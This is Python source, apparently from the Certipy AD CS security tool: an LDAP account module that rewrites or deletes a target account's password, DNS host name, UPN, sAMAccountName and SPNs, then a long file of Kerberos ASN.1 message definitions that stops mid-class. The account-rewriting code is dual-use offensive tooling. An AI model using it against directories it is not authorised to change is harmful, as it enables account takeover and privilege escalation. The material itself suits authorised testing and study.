        user = self.connection.get_user(self.user)
        if user is None:
            return False

        changes = {}
        changes_formatted = {}

        attribute_mapping = {
            "unicodePwd": self.password,
            "dNSHostName": self.dns,
            "userPrincipalName": self.upn,
            "sAMAccountName": self.sam,
            "servicePrincipalName": list(
                filter(
                    lambda x: len(x) > 0, map(lambda x: x.strip(), self.spns.split(","))
                )
            )
            if self.spns is not None
            else None,
        }

        for attribute, value in attribute_mapping.items():
            if value is None:
                continue

            if value == "" or len(value) == 0:
                changes[attribute] = [
                    (
                        ldap3.MODIFY_DELETE,
                        [],
                    )
                ]
                changes_formatted[attribute] = "*DELETED*"
            else:
                if attribute == "unicodePwd":
                    encoded_value = ('"%s"' % value).encode("utf-16-le")
                    changes_formatted[attribute] = [value]
                else:
                    if isinstance(value, list):
                        encoded_value = value
                    else:
                        encoded_value = [value.encode("utf-8")]
                    changes_formatted[attribute] = value

                changes[attribute] = [
                    (
                        ldap3.MODIFY_REPLACE,
                        encoded_value,
                    )
                ]

        logging.info("Updating user %s:" % repr(user.get("sAMAccountName")))
        pretty_print(changes_formatted, indent=2)

        result = self.connection.modify(
            user.get("distinguishedName"),
            changes,
        )

        if result["result"] == 0:
            logging.info("Successfully updated %s" % repr(user.get("sAMAccountName")))
            return True
        elif result["result"] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
            logging.error(
                "User %s doesn't have permission to update these attributes on %s"
                % (repr(self.target.username), repr(user.get("sAMAccountName")))
            )
        else:
            logging.error("Received error: %s" % result["message"])

        return False

    def delete(self):
        user = self.connection.get_user(self.user)
        if user is None:
            return False

        result = self.connection.delete(user.get("distinguishedName"))
        if result["result"] == 0:
            logging.info("Successfully deleted %s" % repr(user.get("sAMAccountName")))
            return True
        elif result["result"] == ldap3.core.results.RESULT_INSUFFICIENT_ACCESS_RIGHTS:
            logging.error(
                "User %s doesn't have permission to delete %s"
                % (repr(self.target.username), repr(user.get("sAMAccountName")))
            )
        else:
            logging.error("Received error: %s" % result["message"])


def entry(options: argparse.Namespace) -> None:
    target = Target.from_options(options, dc_as_target=True)
    del options.target

    account = Account(target, **vars(options))

    actions = {
        "create": account.create,
        "read": account.read,
        "update": account.update,
        "delete": account.delete,
    }

    actions[options.account_action]()



import enum
import io

from asn1crypto import core

from certipy.lib.formatting import to_pascal_case


class IntFlag(enum.IntFlag):
    def to_list(self):
        cls = self.__class__
        members, _ = enum._decompose(cls, self._value_)
        return members

    def to_str_list(self):
        try:
            return list(map(lambda x: str(x), list(self)))
        except:
            return list(map(lambda x: str(x), self.to_list()))

    def __str__(self):
        cls = self.__class__
        if self._name_ is not None:
            return "%s" % (to_pascal_case(self._name_))
        members, _ = enum._decompose(cls, self._value_)
        if len(members) == 1 and members[0]._name_ is None:
            return "%r" % (members[0]._value_)
        else:
            return "%s" % (
                ", ".join(
                    [to_pascal_case(str(m._name_ or m._value_)) for m in members]
                ),
            )

    def __repr__(self):
        return str(self)

class Flag(enum.Flag):
    def __str__(self):
        cls = self.__class__
        if self._name_ is not None:
            return "%s" % (to_pascal_case(self._name_))
        members, _ = enum._decompose(cls, self._value_)
        if len(members) == 1 and members[0]._name_ is None:
            return "%r" % (members[0]._value_)
        else:
            return "%s" % (
                ", ".join(
                    [to_pascal_case(str(m._name_ or m._value_)) for m in members]
                ),
            )

# KerberosV5Spec2 DEFINITIONS EXPLICIT TAGS ::=
TAG = "explicit"

# class
UNIVERSAL = 0
APPLICATION = 1
CONTEXT = 2
krb5_pvno = 5  # -- current Kerberos protocol version number


class PADATA_TYPE(core.Enumerated):
    _map = {
        0: "NONE",  # (0),
        1: "TGS-REQ",  # (1), #		1   : 'AP-REQ', #(1),
        2: "ENC-TIMESTAMP",  # (2),
        3: "PW-SALT",  # (3),
        5: "ENC-UNIX-TIME",  # (5),
        6: "SANDIA-SECUREID",  # (6),
        7: "SESAME",  # (7),
        8: "OSF-DCE",  # (8),
        9: "CYBERSAFE-SECUREID",  # (9),
        10: "AFS3-SALT",  # (10),
        11: "ETYPE-INFO",  # (11),
        12: "SAM-CHALLENGE",  # (12), -- ', #(sam/otp)
        13: "SAM-RESPONSE",  # (13), -- ', #(sam/otp)
        14: "PK-AS-REQ-19",  # (14), -- ', #(PKINIT-19)
        15: "PK-AS-REP-19",  # (15), -- ', #(PKINIT-19)
        15: "PK-AS-REQ-WIN",  # (15), -- ', #(PKINIT - old number)
        16: "PK-AS-REQ",  # (16), -- ', #(PKINIT-25)
        17: "PK-AS-REP",  # (17), -- ', #(PKINIT-25)
        18: "PA-PK-OCSP-RESPONSE",  # (18),
        19: "ETYPE-INFO2",  # (19),
        20: "USE-SPECIFIED-KVNO",  # (20),
        20: "SVR-REFERRAL-INFO",  # (20), --- old ms referral number
        21: "SAM-REDIRECT",  # (21), -- ', #(sam/otp)
        22: "GET-FROM-TYPED-DATA",  # (22),
        23: "SAM-ETYPE-INFO",  # (23),
        25: "SERVER-REFERRAL",  # (25),
        24: "ALT-PRINC",  # (24),		-- ', #(crawdad@fnal.gov)
        30: "SAM-CHALLENGE2",  # (30),		-- ', #(kenh@pobox.com)
        31: "SAM-RESPONSE2",  # (31),		-- ', #(kenh@pobox.com)
        41: "PA-EXTRA-TGT",  # (41),			-- Reserved extra TGT
        102: "TD-KRB-PRINCIPAL",  # (102),	-- PrincipalName
        104: "PK-TD-TRUSTED-CERTIFIERS",  # (104), -- PKINIT
        105: "PK-TD-CERTIFICATE-INDEX",  # (105), -- PKINIT
        106: "TD-APP-DEFINED-ERROR",  # (106),	-- application specific
        107: "TD-REQ-NONCE",  # (107),		-- INTEGER
        108: "TD-REQ-SEQ",  # (108),		-- INTEGER
        128: "PA-PAC-REQUEST",  # (128),	-- jbrezak@exchange.microsoft.com
        129: "PA-FOR-USER",  # (129),		-- MS-KILE
        130: "FOR-X509-USER",  # (130),		-- MS-KILE
        131: "FOR-CHECK-DUPS",  # (131),	-- MS-KILE
        132: "AS-CHECKSUM",  # (132),		-- MS-KILE
        132: "PK-AS-09-BINDING",  # (132),	-- client send this to -- tell KDC that is supports -- the asCheckSum in the --  PK-AS-REP
        133: "CLIENT-CANONICALIZED",  # (133),	-- referals
        133: "FX-COOKIE",  # (133),		-- krb-wg-preauth-framework
        134: "AUTHENTICATION-SET",  # (134),	-- krb-wg-preauth-framework
        135: "AUTH-SET-SELECTED",  # (135),	-- krb-wg-preauth-framework
        136: "FX-FAST",  # (136),		-- krb-wg-preauth-framework
        137: "FX-ERROR",  # (137),		-- krb-wg-preauth-framework
        138: "ENCRYPTED-CHALLENGE",  # (138),	-- krb-wg-preauth-framework
        141: "OTP-CHALLENGE",  # (141),		-- ', #(gareth.richards@rsa.com)
        142: "OTP-REQUEST",  # (142),		-- ', #(gareth.richards@rsa.com)
        143: "OTP-CONFIRM",  # (143),		-- ', #(gareth.richards@rsa.com)
        144: "OTP-PIN-CHANGE",  # (144),	-- ', #(gareth.richards@rsa.com)
        145: "EPAK-AS-REQ",  # (145),
        146: "EPAK-AS-REP",  # (146),
        147: "PKINIT-KX",  # (147),		-- krb-wg-anon
        148: "PKU2U-NAME",  # (148),		-- zhu-pku2u
        149: "REQ-ENC-PA-REP",  # (149),	--
        151: "SPAKE",  # (151),	https://datatracker.ietf.org/doc/draft-ietf-kitten-krb-spake-preauth/?include_text=1
        165: "SUPPORTED-ETYPES",  # (165)	-- MS-KILE
        167: "PA-PAC-OPTIONS",
    }


class AUTHDATA_TYPE(core.Enumerated):
    _map = {
        1: "IF-RELEVANT",  # 1),
        2: "INTENDED-FOR-SERVER",  # 2),
        3: "INTENDED-FOR-APPLICATION-CLASS",  # 3),
        4: "KDC-ISSUED",  # 4),
        5: "AND-OR",  # 5),
        6: "MANDATORY-TICKET-EXTENSIONS",  # 6),
        7: "IN-TICKET-EXTENSIONS",  # 7),
        8: "MANDATORY-FOR-KDC",  # 8),
        9: "INITIAL-VERIFIED-CAS",  # 9),
        64: "OSF-DCE",  # 64),
        65: "SESAME",  # 65),
        66: "OSF-DCE-PKI-CERTID",  # 66),
        70: "AD-authentication-strength",
        71: "AD-fx-fast-armor",
        72: "AD-fx-fast-used",
        128: "WIN2K-PAC",  # 128),
        129: "GSS-API-ETYPE-NEGOTIATION",  # 129), -- Authenticator only
        -17: "SIGNTICKET-OLDER",  # -17),
        142: "SIGNTICKET-OLD",  # 142),
        512: "SIGNTICKET",  # 512)
    }


class CKSUMTYPE(core.Enumerated):
    _map = {
        0: "NONE",  # 0),
        1: "CRC32",  # 1),
        2: "RSA_MD4",  # 2),
        3: "RSA_MD4_DES",  # 3),
        4: "DES_MAC",  # 4),
        5: "DES_MAC_K",  # 5),
        6: "RSA_MD4_DES_K",  # 6),
        7: "RSA_MD5",  # 7),
        8: "RSA_MD5_DES",  # 8),
        9: "RSA_MD5_DES3",  # 9),
        10: "SHA1_OTHER",  # 10),
        12: "HMAC_SHA1_DES3",  # 12),
        14: "SHA1",  # 14),
        15: "HMAC_SHA1_96_AES_128",  # 15),
        16: "HMAC_SHA1_96_AES_256",  # 16),
        0x8003: "GSSAPI",  # 0x8003),
        -138: "HMAC_MD5",  # -138),	-- unofficial microsoft number
        -1138: "HMAC_MD5_ENC",  # -1138)	-- even more unofficial
    }


# enctypes
class ENCTYPE(core.Enumerated):
    _map = {
        0: "NULL",  # 0),
        1: "DES_CBC_CRC",  # 1),
        2: "DES_CBC_MD4",  # 2),
        3: "DES_CBC_MD5",  # 3),
        5: "DES3_CBC_MD5",  # 5),
        7: "OLD_DES3_CBC_SHA1",  # 7),
        8: "SIGN_DSA_GENERATE",  # 8),
        9: "ENCRYPT_RSA_PRIV",  # 9),
        10: "ENCRYPT_RSA_PUB",  # 10),
        16: "DES3_CBC_SHA1",  # 16),	-- with key derivation
        17: "AES128_CTS_HMAC_SHA1_96",  # 17),
        18: "AES256_CTS_HMAC_SHA1_96",  # 18),
        23: "ARCFOUR_HMAC_MD5",  # 23),
        24: "ARCFOUR_HMAC_MD5_56",  # 24),
        48: "ENCTYPE_PK_CROSS",  # 48),
        # -- some "old" windows types
        -128: "ARCFOUR_MD4",  # -128),
        -133: "ARCFOUR_HMAC_OLD",  # -133),
        -135: "ARCFOUR_HMAC_OLD_EXP",  # -135),
        # -- these are for Heimdal internal use
        -0x1000: "DES_CBC_NONE",  # -0x1000),
        -0x1001: "DES3_CBC_NONE",  # -0x1001),
        -0x1002: "DES_CFB64_NONE",  # -0x1002),
        -0x1003: "DES_PCBC_NONE",  # -0x1003),
        -0x1004: "DIGEST_MD5_NONE",  # -0x1004),		-- private use, lukeh@padl.com
        -0x1005: "CRAM_MD5_NONE",  # -0x1005)		-- private use, lukeh@padl.com
    }


class SequenceOfEnctype(core.SequenceOf):
    _child_spec = core.Integer


class Microseconds(core.Integer):
    """::= INTEGER (0..999999)
    -- microseconds
    """


class krb5int32(core.Integer):
    """krb5int32  ::= INTEGER (-2147483648..2147483647)"""


class krb5uint32(core.Integer):
    """krb5uint32  ::= INTEGER (0..4294967295)"""


class KerberosString(core.GeneralString):
    """KerberosString ::= GeneralString (IA5String)
    For compatibility, implementations MAY choose to accept GeneralString
    values that contain characters other than those permitted by
    IA5String...
    """


class SequenceOfKerberosString(core.SequenceOf):
    _child_spec = KerberosString


# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class Realm(KerberosString):
    """Realm ::= KerberosString"""


# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class PrincipalName(core.Sequence):
    """PrincipalName for KDC-REQ-BODY and Ticket
    PrincipalName ::= SEQUENCE {
            name-type	[0] Int32,
            name-string  [1] SEQUENCE OF KerberosString
    }
    """

    _fields = [
        ("name-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("name-string", SequenceOfKerberosString, {"tag_type": TAG, "tag": 1}),
    ]


class Principal(core.Sequence):
    _fields = [
        ("name", PrincipalName, {"tag_type": TAG, "tag": 0}),
        ("realm", Realm, {"tag_type": TAG, "tag": 1}),
    ]


class Principals(core.SequenceOf):
    _child_spec = Principal


class HostAddress(core.Sequence):
    """HostAddress for HostAddresses
    HostAddress ::= SEQUENCE {
        addr-type        [0] Int32,
        address  [1] OCTET STRING
    }
    """

    _fields = [
        ("addr-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("address", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]


class HostAddresses(core.SequenceOf):
    """SEQUENCE OF HostAddress"""

    _child_spec = HostAddress


class KerberosTime(core.GeneralizedTime):
    """KerberosTime ::= GeneralizedTime"""


class AuthorizationDataElement(core.Sequence):
    _fields = [
        ("ad-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("ad-data", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]


class AuthorizationData(core.SequenceOf):
    """SEQUENCE OF HostAddress"""

    _child_spec = AuthorizationDataElement


class APOptions(core.BitString):
    _map = {
        0: "reserved",  # (0),
        1: "use-session-key",  # (1),
        2: "mutual-required",  # (2)
    }


class TicketFlags(core.BitString):
    _map = {
        0: "reserved",
        1: "forwardable",
        2: "forwarded",
        3: "proxiable",
        4: "proxy",
        5: "may-postdate",
        6: "postdated",
        7: "invalid",
        8: "renewable",
        9: "initial",
        10: "pre-authent",
        11: "hw-authent",
        12: "transited-policy-checked",
        13: "ok-as-delegate",
        14: "anonymous",
        15: "enc-pa-rep",
    }


class KDCOptions(core.BitString):
    _map = {
        0: "reserved",
        1: "forwardable",
        2: "forwarded",
        3: "proxiable",
        4: "proxy",
        5: "allow-postdate",
        6: "postdated",
        7: "unused7",
        8: "renewable",
        9: "unused9",
        10: "unused10",
        11: "opt-hardware-auth",
        12: "unused12",
        13: "unused13",
        14: "constrained-delegation",  # -- cname-in-addl-tkt (14)
        15: "canonicalize",
        16: "request-anonymous",
        17: "unused17",
        18: "unused18",
        19: "unused19",
        20: "unused20",
        21: "unused21",
        22: "unused22",
        23: "unused23",
        24: "unused24",
        25: "unused25",
        26: "disable-transited-check",
        27: "renewable-ok",
        28: "enc-tkt-in-skey",
        30: "renew",
        31: "validate",
    }


class LR_TYPE(core.Enumerated):
    _map = {
        0: "NONE",  # 0),		-- no information
        1: "INITIAL_TGT",  # 1),	-- last initial TGT request
        2: "INITIAL",  # 2),		-- last initial request
        3: "ISSUE_USE_TGT",  # 3),	-- time of newest TGT used
        4: "RENEWAL",  # 4),		-- time of last renewal
        5: "REQUEST",  # 5),		-- time of last request ', #of any type)
        6: "PW_EXPTIME",  # 6),	-- expiration time of password
        7: "ACCT_EXPTIME",  # 7)	-- expiration time of account
    }


class LastReqInner(core.Sequence):
    _fields = [
        ("lr-type", krb5int32, {"tag_type": TAG, "tag": 0}),  # LR_TYPE
        ("lr-value", KerberosTime, {"tag_type": TAG, "tag": 1}),
    ]


class LastReq(core.SequenceOf):
    _child_spec = LastReqInner


class EncryptedData(core.Sequence):
    _fields = [
        ("etype", krb5int32, {"tag_type": TAG, "tag": 0}),  # -- EncryptionType
        ("kvno", krb5uint32, {"tag_type": TAG, "tag": 1, "optional": True}),  #
        ("cipher", core.OctetString, {"tag_type": TAG, "tag": 2}),  # ciphertext
    ]


class EncryptionKey(core.Sequence):
    _fields = [
        ("keytype", krb5uint32, {"tag_type": TAG, "tag": 0}),  # -- EncryptionType
        ("keyvalue", core.OctetString, {"tag_type": TAG, "tag": 1}),  #
    ]


# -- encoded Transited field


class TransitedEncoding(core.Sequence):
    _fields = [
        ("tr-type", krb5uint32, {"tag_type": TAG, "tag": 0}),  # -- must be registered
        ("contents", core.OctetString, {"tag_type": TAG, "tag": 1}),  #
    ]


# https://github.com/tiran/kkdcpasn1/blob/asn1crypto/pykkdcpasn1.py
class Ticket(core.Sequence):
    explicit = (APPLICATION, 1)

    _fields = [
        ("tkt-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("realm", Realm, {"tag_type": TAG, "tag": 1}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 3}),  # EncTicketPart
    ]


class SequenceOfTicket(core.SequenceOf):
    """SEQUENCE OF Ticket for KDC-REQ-BODY"""

    _child_spec = Ticket


# -- Encrypted part of ticket
class EncTicketPart(core.Sequence):
    explicit = (APPLICATION, 3)

    _fields = [
        ("flags", TicketFlags, {"tag_type": TAG, "tag": 0}),
        ("key", EncryptionKey, {"tag_type": TAG, "tag": 1}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 2}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 3}),
        ("transited", TransitedEncoding, {"tag_type": TAG, "tag": 4}),
        ("authtime", KerberosTime, {"tag_type": TAG, "tag": 5}),
        ("starttime", KerberosTime, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("endtime", KerberosTime, {"tag_type": TAG, "tag": 7}),
        ("renew-till", KerberosTime, {"tag_type": TAG, "tag": 8, "optional": True}),
        ("caddr", HostAddresses, {"tag_type": TAG, "tag": 9, "optional": True}),
        (
            "authorization-data",
            AuthorizationData,
            {"tag_type": TAG, "tag": 10, "optional": True},
        ),
    ]


class Checksum(core.Sequence):
    _fields = [
        ("cksumtype", krb5int32, {"tag_type": TAG, "tag": 0}),  # CKSUMTYPE
        ("checksum", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]


class Authenticator(core.Sequence):
    explicit = (APPLICATION, 2)

    _fields = [
        ("authenticator-vno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 1}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 2}),
        ("cksum", Checksum, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("cusec", krb5int32, {"tag_type": TAG, "tag": 4}),
        ("ctime", KerberosTime, {"tag_type": TAG, "tag": 5}),
        ("subkey", EncryptionKey, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 7, "optional": True}),
        (
            "authorization-data",
            AuthorizationData,
            {"tag_type": TAG, "tag": 8, "optional": True},
        ),
    ]


class PA_DATA(core.Sequence):  #!!!! IT STARTS AT ONE!!!!
    _fields = [
        ("padata-type", core.Integer, {"tag_type": TAG, "tag": 1}),
        ("padata-value", core.OctetString, {"tag_type": TAG, "tag": 2}),
    ]


class ETYPE_INFO_ENTRY(core.Sequence):
    _fields = [
        ("etype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("salt", core.OctetString, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("salttype", krb5int32, {"tag_type": TAG, "tag": 2, "optional": True}),
    ]


class ETYPE_INFO(core.SequenceOf):
    _child_spec = ETYPE_INFO_ENTRY


class ETYPE_INFO2_ENTRY(core.Sequence):
    _fields = [
        ("etype", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("salt", KerberosString, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("s2kparams", core.OctetString, {"tag_type": TAG, "tag": 2, "optional": True}),
    ]


class ETYPE_INFO2(core.SequenceOf):
    _child_spec = ETYPE_INFO2_ENTRY


class METHOD_DATA(core.SequenceOf):
    _child_spec = PA_DATA


class TypedData(core.Sequence):
    _fields = [
        ("data-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("data-value", core.OctetString, {"tag_type": TAG, "tag": 1, "optional": True}),
    ]


"""
class TYPED-DATA ::= SEQUENCE SIZE (1..MAX) OF TypedData
"""


class KDC_REQ_BODY(core.Sequence):
    _fields = [
        ("kdc-options", KDCOptions, {"tag_type": TAG, "tag": 0}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("realm", Realm, {"tag_type": TAG, "tag": 2}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("from", KerberosTime, {"tag_type": TAG, "tag": 4, "optional": True}),
        ("till", KerberosTime, {"tag_type": TAG, "tag": 5, "optional": True}),
        ("rtime", KerberosTime, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("nonce", krb5int32, {"tag_type": TAG, "tag": 7}),
        (
            "etype",
            SequenceOfEnctype,
            {"tag_type": TAG, "tag": 8},
        ),  # -- EncryptionType,preference order
        ("addresses", HostAddresses, {"tag_type": TAG, "tag": 9, "optional": True}),
        (
            "enc-authorization-data",
            EncryptedData,
            {"tag_type": TAG, "tag": 10, "optional": True},
        ),  # -- Encrypted AuthorizationData encoding
        (
            "additional-tickets",
            SequenceOfTicket,
            {"tag_type": TAG, "tag": 11, "optional": True},
        ),
    ]


class KDC_REQ(core.Sequence):
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 1}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 2}),  # MESSAGE_TYPE
        ("padata", METHOD_DATA, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("req-body", KDC_REQ_BODY, {"tag_type": TAG, "tag": 4}),
    ]


class AS_REQ(KDC_REQ):
    explicit = (APPLICATION, 10)


class TGS_REQ(KDC_REQ):
    explicit = (APPLICATION, 12)


class FastOptions(core.BitString):
    _map = {
        0: "reserved",
        1: "hide-client-names",
        2: "critical_2",  # forwarded',
        3: "critical_3",  # proxiable',
        4: "critical_4",  # proxy',
        5: "critical_5",  # may-postdate',
        6: "critical_6",  # postdated',
        7: "critical_7",  # invalid',
        8: "critical_8",  # renewable',
        9: "critical_9",  # initial',
        10: "critical_10",  # pre-authent',
        11: "critical_11",  # hw-authent',
        12: "critical_12",  # transited-policy-checked',
        13: "critical_13",  # ok-as-delegate',
        14: "critical_14",  # anonymous',
        15: "critical_15",  # enc-pa-rep',
        16: "kdc-follow-referrals",
    }
    # error: KDC_ERR_UNKNOWN_CRITICAL_FAST_OPTIONS   93


# 5.4.1.  FAST Armors


class EncryptedChallenge(EncryptedData):
    pass


class AUTHENTICATION_SET_ELEM(core.SequenceOf):
    _fields = [
        ("pa-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("pa-hint", core.OctetString, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("pa-value", core.OctetString, {"tag_type": TAG, "tag": 1, "optional": True}),
    ]


class AUTHENTICATION_SET(core.SequenceOf):
    _child_spec = AUTHENTICATION_SET_ELEM


class KrbFastArmor(core.Sequence):
    _fields = [
        ("armor-type", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("armor-value", core.OctetString, {"tag_type": TAG, "tag": 1}),
    ]


class KrbFastArmoredReq(core.Sequence):
    _fields = [
        ("armor", KrbFastArmor, {"tag_type": TAG, "tag": 0, "optional": True}),
        ("req-checksum", Checksum, {"tag_type": TAG, "tag": 1}),
        (
            "enc-fast-req",
            EncryptedData,
            {"tag_type": TAG, "tag": 2},
        ),  # KrbFastReq #KEY_USAGE_FAST_REQ_CHKSUM          50 #KEY_USAGE_FAST_ENC                 51
    ]


class KrbFastReq(core.Sequence):
    _fields = [
        ("fast-options", FastOptions, {"tag_type": TAG, "tag": 0}),
        ("padata", METHOD_DATA, {"tag_type": TAG, "tag": 1}),
        ("req-body", KDC_REQ_BODY, {"tag_type": TAG, "tag": 2}),
    ]


class KrbFastFinished(core.Sequence):
    _fields = [
        ("timestamp", KerberosTime, {"tag_type": TAG, "tag": 0}),
        ("usec", Microseconds, {"tag_type": TAG, "tag": 1}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 2}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 3}),
        (
            "ticket-checksum",
            Checksum,
            {"tag_type": TAG, "tag": 4},
        ),  # KEY_USAGE_FAST_FINISHED            53
    ]


class KrbFastArmoredRep(core.Sequence):
    _fields = [
        (
            "enc-fast-rep",
            EncryptedData,
            {"tag_type": TAG, "tag": 0},
        ),  # KrbFastResponse KEY_USAGE_FAST_REP                 52
    ]


class KrbFastResponse(core.Sequence):
    _fields = [
        ("padata", METHOD_DATA, {"tag_type": TAG, "tag": 0}),
        (
            "strengthen-key",
            EncryptionKey,
            {"tag_type": TAG, "tag": 1, "optional": True},
        ),
        (
            "finished",
            KrbFastFinished,
            {"tag_type": TAG, "tag": 2, "optional": True},
        ),  # KrbFastReq #KEY_USAGE_FAST_REQ_CHKSUM          50 #KEY_USAGE_FAST_ENC                 51
        ("nonce", krb5uint32, {"tag_type": TAG, "tag": 3}),
    ]


# -- padata-type ::= PA-ENC-TIMESTAMP
# -- padata-value ::= EncryptedData - PA-ENC-TS-ENC


class PA_PAC_OPTIONSTypes(core.BitString):
    _map = {
        0: "Claims",
        1: "Branch Aware",
        2: "Forward to Full DC",
        3: "resource-based constrained delegation",
    }


class PA_FX_FAST_REQUEST(core.Choice):
    _alternatives = [
        ("armored-data", KrbFastArmoredReq, {"explicit": (CONTEXT, 0)}),
    ]


class PA_FX_FAST_REPLY(core.Choice):
    _alternatives = [
        ("armored-data", KrbFastArmoredRep, {"explicit": (CONTEXT, 0)}),
    ]


class PA_PAC_OPTIONS(core.Sequence):
    _fields = [
        ("value", PA_PAC_OPTIONSTypes, {"tag_type": TAG, "tag": 0}),
    ]


class PA_ENC_TS_ENC(core.Sequence):
    _fields = [
        ("patimestamp", KerberosTime, {"tag_type": TAG, "tag": 0}),  # -- client's time
        ("pausec", krb5int32, {"tag_type": TAG, "tag": 1, "optional": True}),
    ]


# -- draft-brezak-win2k-krb-authz-01
class PA_PAC_REQUEST(core.Sequence):
    _fields = [
        (
            "include-pac",
            core.Boolean,
            {"tag_type": TAG, "tag": 0},
        ),  # -- Indicates whether a PAC should be included or not
    ]


# -- PacketCable provisioning server location, PKT-SP-SEC-I09-030728.pdf
class PROV_SRV_LOCATION(core.GeneralString):
    pass


class KDC_REP(core.Sequence):
    _fields = [
        ("pvno", core.Integer, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("padata", METHOD_DATA, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("crealm", Realm, {"tag_type": TAG, "tag": 3}),
        ("cname", PrincipalName, {"tag_type": TAG, "tag": 4}),
        ("ticket", Ticket, {"tag_type": TAG, "tag": 5}),
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 6}),  # EncKDCRepPart
    ]


class AS_REP(KDC_REP):
    #::= [APPLICATION 11] KDC-REP
    explicit = (APPLICATION, 11)


class TGS_REP(KDC_REP):  # ::= [APPLICATION 13] KDC-REP
    explicit = (APPLICATION, 13)


class EncKDCRepPart(core.Sequence):
    _fields = [
        ("key", EncryptionKey, {"tag_type": TAG, "tag": 0}),
        ("last-req", LastReq, {"tag_type": TAG, "tag": 1}),
        ("nonce", krb5int32, {"tag_type": TAG, "tag": 2}),
        ("key-expiration", KerberosTime, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("flags", TicketFlags, {"tag_type": TAG, "tag": 4}),
        ("authtime", KerberosTime, {"tag_type": TAG, "tag": 5}),
        ("starttime", KerberosTime, {"tag_type": TAG, "tag": 6, "optional": True}),
        ("endtime", KerberosTime, {"tag_type": TAG, "tag": 7}),
        ("renew-till", KerberosTime, {"tag_type": TAG, "tag": 8, "optional": True}),
        ("srealm", Realm, {"tag_type": TAG, "tag": 9}),
        ("sname", PrincipalName, {"tag_type": TAG, "tag": 10}),
        ("caddr", HostAddresses, {"tag_type": TAG, "tag": 11, "optional": True}),
        (
            "encrypted-pa-data",
            METHOD_DATA,
            {"tag_type": TAG, "tag": 12, "optional": True},
        ),
    ]


class EncASRepPart(EncKDCRepPart):
    explicit = (APPLICATION, 25)


class EncTGSRepPart(EncKDCRepPart):
    explicit = (APPLICATION, 26)


class AP_REQ(core.Sequence):
    explicit = (APPLICATION, 14)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("ap-options", APOptions, {"tag_type": TAG, "tag": 2}),
        ("ticket", Ticket, {"tag_type": TAG, "tag": 3}),
        ("authenticator", EncryptedData, {"tag_type": TAG, "tag": 4}),
    ]


class AP_REP(core.Sequence):
    explicit = (APPLICATION, 15)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("enc-part", EncryptedData, {"tag_type": TAG, "tag": 2}),
    ]


class EncAPRepPart(core.Sequence):
    explicit = (APPLICATION, 27)
    _fields = [
        ("ctime", KerberosTime, {"tag_type": TAG, "tag": 0}),
        ("cusec", krb5int32, {"tag_type": TAG, "tag": 1}),
        ("subkey", EncryptionKey, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 3, "optional": True}),
    ]


class KRB_SAFE_BODY(core.Sequence):
    _fields = [
        ("user-data", core.OctetString, {"tag_type": TAG, "tag": 0}),
        ("timestamp", KerberosTime, {"tag_type": TAG, "tag": 1, "optional": True}),
        ("usec", krb5int32, {"tag_type": TAG, "tag": 2, "optional": True}),
        ("seq-number", krb5uint32, {"tag_type": TAG, "tag": 3, "optional": True}),
        ("s-address", HostAddress, {"tag_type": TAG, "tag": 4, "optional": True}),
        ("r-address", HostAddress, {"tag_type": TAG, "tag": 5, "optional": True}),
    ]


class KRB_SAFE(core.Sequence):
    explicit = (APPLICATION, 20)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
        ("msg-type", krb5int32, {"tag_type": TAG, "tag": 1}),  # MESSAGE_TYPE
        ("safe-body", KRB_SAFE_BODY, {"tag_type": TAG, "tag": 2}),
        ("cksum", Checksum, {"tag_type": TAG, "tag": 3}),
    ]


class KRB_PRIV(core.Sequence):
    explicit = (APPLICATION, 21)
    _fields = [
        ("pvno", krb5int32, {"tag_type": TAG, "tag": 0}),
